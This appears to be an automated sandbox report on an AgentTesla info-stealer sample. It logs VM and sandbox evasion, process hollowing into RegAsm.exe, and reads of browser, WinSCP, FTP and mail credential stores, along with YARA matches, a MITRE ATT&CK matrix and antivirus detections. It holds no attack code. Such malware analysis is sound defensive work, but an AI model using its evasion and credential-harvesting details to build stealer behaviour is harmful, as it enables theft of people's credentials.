Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Memory allocated: 10F0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Memory allocated: 2E00000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Memory allocated: 4E00000 memory reserve \| memory write watch	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 922337203685477			Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Window / User API: threadDelayed 495			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Window / User API: threadDelayed 2516			Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7368	Thread sleep count: 179 > 30	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7368	Thread sleep time: -179000s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7464	Thread sleep time: -11990383647911201s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7464	Thread sleep time: -100000s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7468	Thread sleep count: 495 > 30	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7464	Thread sleep time: -99877s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7468	Thread sleep count: 2516 > 30	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7464	Thread sleep time: -99750s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7464	Thread sleep time: -99641s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7464	Thread sleep time: -99532s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7464	Thread sleep time: -99407s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7464	Thread sleep time: -99282s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7464	Thread sleep time: -99157s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7464	Thread sleep time: -99032s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7464	Thread sleep time: -98922s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7464	Thread sleep time: -98813s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7464	Thread sleep time: -98688s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7464	Thread sleep time: -98563s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7464	Thread sleep time: -98438s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7464	Thread sleep time: -98313s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7464	Thread sleep time: -98201s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7464	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 100000	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 99877	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 99750	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 99641	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 99532	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 99407	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 99282	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 99157	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 99032	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 98922	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 98813	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 98688	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 98563	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 98438	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 98313	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 98201	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: RegAsm.exe, 00000001.00000002.4159173117.0000000006150000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\VYLigyTDuW.exe	Code function: 0_2_0054B055 mov eax, dword ptr fs:[00000030h]	0_2_0054B055
Source: C:\Users\user\Desktop\VYLigyTDuW.exe	Code function: 0_2_0054ACFA mov eax, dword ptr fs:[00000030h]	0_2_0054ACFA
Source: C:\Users\user\Desktop\VYLigyTDuW.exe	Code function: 0_2_0054AD6C mov eax, dword ptr fs:[00000030h]	0_2_0054AD6C
Source: C:\Users\user\Desktop\VYLigyTDuW.exe	Code function: 0_2_0054AD80 mov eax, dword ptr fs:[00000030h]	0_2_0054AD80
Source: C:\Users\user\Desktop\VYLigyTDuW.exe	Code function: 0_2_022A2DA5 mov eax, dword ptr fs:[00000030h]	0_2_022A2DA5
Source: C:\Users\user\Desktop\VYLigyTDuW.exe	Code function: 0_2_022A3376 mov eax, dword ptr fs:[00000030h]	0_2_022A3376
Source: C:\Users\user\Desktop\VYLigyTDuW.exe	Code function: 0_2_022A6F52 mov eax, dword ptr fs:[00000030h]	0_2_022A6F52
Source: C:\Users\user\Desktop\VYLigyTDuW.exe	Code function: 0_2_022A707B mov eax, dword ptr fs:[00000030h]	0_2_022A707B
Source: C:\Users\user\Desktop\VYLigyTDuW.exe	Code function: 0_2_022A6C8B mov eax, dword ptr fs:[00000030h]	0_2_022A6C8B
Source: C:\Users\user\Desktop\VYLigyTDuW.exe	Code function: 0_2_022A6CEC mov eax, dword ptr fs:[00000030h]	0_2_022A6CEC
Source: C:\Users\user\Desktop\VYLigyTDuW.exe	Code function: 0_2_022A7109 mov eax, dword ptr fs:[00000030h]	0_2_022A7109
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 1_2_00443C55 mov eax, dword ptr fs:[00000030h]	1_2_00443C55
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 1_2_004438CD mov eax, dword ptr fs:[00000030h]	1_2_004438CD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 1_2_00443CBD mov eax, dword ptr fs:[00000030h]	1_2_00443CBD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 1_2_00443D4B mov eax, dword ptr fs:[00000030h]	1_2_00443D4B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 1_2_00443921 mov eax, dword ptr fs:[00000030h]	1_2_00443921
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 1_2_0044392E mov eax, dword ptr fs:[00000030h]	1_2_0044392E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 1_2_004439A6 mov eax, dword ptr fs:[00000030h]	1_2_004439A6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 1_2_004442FD mov ecx, dword ptr fs:[00000030h]	1_2_004442FD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 1_2_00443AB5 mov eax, dword ptr fs:[00000030h]	1_2_00443AB5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 1_2_00443B94 mov eax, dword ptr fs:[00000030h]	1_2_00443B94

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Process token adjusted: Debug

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Maps a DLL or memory area into another process

Source: C:\Users\user\Desktop\VYLigyTDuW.exe

Section loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe protection: execute and read and write

Jump to behavior

Sample uses process hollowing technique

Source: C:\Users\user\Desktop\VYLigyTDuW.exe

Section unmapped: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base address: 400000

Jump to behavior

Writes to foreign memory regions

Source: C:\Users\user\Desktop\VYLigyTDuW.exe

Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: B16008

Jump to behavior

Source: C:\Users\user\Desktop\VYLigyTDuW.exe

Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe"

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\VYLigyTDuW.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected AgentTesla

Source: Yara match	File source: dump.pcap, type: PCAP
Source: Yara match	File source: 0.3.VYLigyTDuW.exe.6d1a10.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.VYLigyTDuW.exe.6d1a04.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.VYLigyTDuW.exe.6d1a10.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.VYLigyTDuW.exe.6d1a04.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.VYLigyTDuW.exe.6d1a10.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.VYLigyTDuW.exe.6d1a10.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.VYLigyTDuW.exe.6d1a10.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.VYLigyTDuW.exe.6d1a10.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.VYLigyTDuW.exe.23a0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000001.00000002.4156794778.0000000002E82000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.4156794778.0000000002E7C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1704627717.00000000006D1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1706415121.00000000023A2000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1698582949.00000000040B1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1704541031.00000000006D1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1698333641.00000000006B2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1698654961.00000000006D1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.4154134702.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.4156794778.0000000002E51000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: VYLigyTDuW.exe PID: 7300, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 7360, type: MEMORYSTR

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions

Jump to behavior

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini	Jump to behavior

Tries to harvest and steal ftp login credentials

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

File opened: C:\FTP Navigator\Ftplist.txt

Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities	Jump to behavior

Source: Yara match	File source: 0.3.VYLigyTDuW.exe.6d1a10.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.VYLigyTDuW.exe.6d1a04.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.VYLigyTDuW.exe.6d1a10.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.VYLigyTDuW.exe.6d1a04.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.VYLigyTDuW.exe.6d1a10.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.VYLigyTDuW.exe.6d1a10.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.VYLigyTDuW.exe.6d1a10.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.VYLigyTDuW.exe.6d1a10.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.VYLigyTDuW.exe.23a0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000003.1704627717.00000000006D1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1706415121.00000000023A2000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1698582949.00000000040B1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1704541031.00000000006D1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1698333641.00000000006B2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1698654961.00000000006D1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.4154134702.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.4156794778.0000000002E51000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: VYLigyTDuW.exe PID: 7300, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 7360, type: MEMORYSTR

Remote Access Functionality

Yara detected AgentTesla

Source: Yara match	File source: dump.pcap, type: PCAP
Source: Yara match	File source: 0.3.VYLigyTDuW.exe.6d1a10.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.VYLigyTDuW.exe.6d1a04.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.VYLigyTDuW.exe.6d1a10.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.VYLigyTDuW.exe.6d1a04.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.VYLigyTDuW.exe.6d1a10.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.VYLigyTDuW.exe.6d1a10.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.VYLigyTDuW.exe.6d1a10.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.VYLigyTDuW.exe.6d1a10.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.VYLigyTDuW.exe.23a0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000001.00000002.4156794778.0000000002E82000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.4156794778.0000000002E7C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1704627717.00000000006D1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1706415121.00000000023A2000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1698582949.00000000040B1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1704541031.00000000006D1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1698333641.00000000006B2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1698654961.00000000006D1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.4154134702.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.4156794778.0000000002E51000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: VYLigyTDuW.exe PID: 7300, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 7360, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	121 Windows Management Instrumentation	1 DLL Side-Loading	1 DLL Side-Loading	1 Disable or Modify Tools	2 OS Credential Dumping	1 File and Directory Discovery	Remote Services	1 Archive Collected Data	1 Ingress Tool Transfer	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 Shared Modules	Boot or Logon Initialization Scripts	311 Process Injection	2 Obfuscated Files or Information	1 Credentials in Registry	24 System Information Discovery	Remote Desktop Protocol	2 Data from Local System	11 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	1 Software Packing	Security Account Manager	111 Security Software Discovery	SMB/Windows Admin Shares	1 Email Collection	1 Non-Standard Port	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	1 DLL Side-Loading	NTDS	1 Process Discovery	Distributed Component Object Model	Input Capture	2 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Masquerading	LSA Secrets	141 Virtualization/Sandbox Evasion	SSH	Keylogging	23 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	141 Virtualization/Sandbox Evasion	Cached Domain Credentials	1 Application Window Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	311 Process Injection	DCSync	1 System Network Configuration Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
VYLigyTDuW.exe	84%	Virustotal		Browse
VYLigyTDuW.exe	88%	ReversingLabs	Win32.Spyware.Negasteal
VYLigyTDuW.exe	100%	Avira	TR/AD.GenSteal.vwwcv

Dropped Files

⊘No Antivirus matches

Unpacked PE Files

⊘No Antivirus matches

Domains

⊘No Antivirus matches

URLs

⊘No Antivirus matches

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
api.ipify.org	172.67.74.152	true	false		high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://api.ipify.org/	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Reputation
http://crl.sectigo.com/SectigoPublicTimeStampingRootR46.crl0	VYLigyTDuW.exe	false	high
https://api.ipify.org	VYLigyTDuW.exe, 00000000.00000003.1704541031.00000000006D1000.00000004.00000020.00020000.00000000.sdmp, VYLigyTDuW.exe, 00000000.00000003.1704627717.00000000006D1000.00000004.00000020.00020000.00000000.sdmp, VYLigyTDuW.exe, 00000000.00000002.1706415121.00000000023A2000.00000040.10000000.00040000.00000000.sdmp, VYLigyTDuW.exe, 00000000.00000003.1698582949.00000000040B1000.00000004.00000020.00020000.00000000.sdmp, VYLigyTDuW.exe, 00000000.00000003.1698333641.00000000006B2000.00000004.00000020.00020000.00000000.sdmp, VYLigyTDuW.exe, 00000000.00000003.1698654961.00000000006D1000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.4156794778.0000000002E01000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.4154134702.0000000000402000.00000040.80000000.00040000.00000000.sdmp	false	high
https://sectigo.com/CPS0	VYLigyTDuW.exe	false	high
http://crt.sectigo.com/SectigoPublicTimeStampingCAR36.crt0#	VYLigyTDuW.exe	false	high
https://account.dyn.com/	VYLigyTDuW.exe, 00000000.00000003.1704541031.00000000006D1000.00000004.00000020.00020000.00000000.sdmp, VYLigyTDuW.exe, 00000000.00000003.1704627717.00000000006D1000.00000004.00000020.00020000.00000000.sdmp, VYLigyTDuW.exe, 00000000.00000002.1706415121.00000000023A2000.00000040.10000000.00040000.00000000.sdmp, VYLigyTDuW.exe, 00000000.00000003.1698582949.00000000040B1000.00000004.00000020.00020000.00000000.sdmp, VYLigyTDuW.exe, 00000000.00000003.1698333641.00000000006B2000.00000004.00000020.00020000.00000000.sdmp, VYLigyTDuW.exe, 00000000.00000003.1698654961.00000000006D1000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.4154134702.0000000000402000.00000040.80000000.00040000.00000000.sdmp	false	high
http://ocsp.sectigo.com0	VYLigyTDuW.exe	false	high
https://api.ipify.org/t	RegAsm.exe, 00000001.00000002.4156794778.0000000002E01000.00000004.00000800.00020000.00000000.sdmp	false	high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	RegAsm.exe, 00000001.00000002.4156794778.0000000002E01000.00000004.00000800.00020000.00000000.sdmp	false	high
http://crl.sectigo.com/SectigoPublicTimeStampingCAR36.crl0z	VYLigyTDuW.exe	false	high
http://crt.sectigo.com/SectigoPublicTimeStampingRootR46.p7c0#	VYLigyTDuW.exe	false	high

World Map of Contacted IPs

No. of IPs < 25%
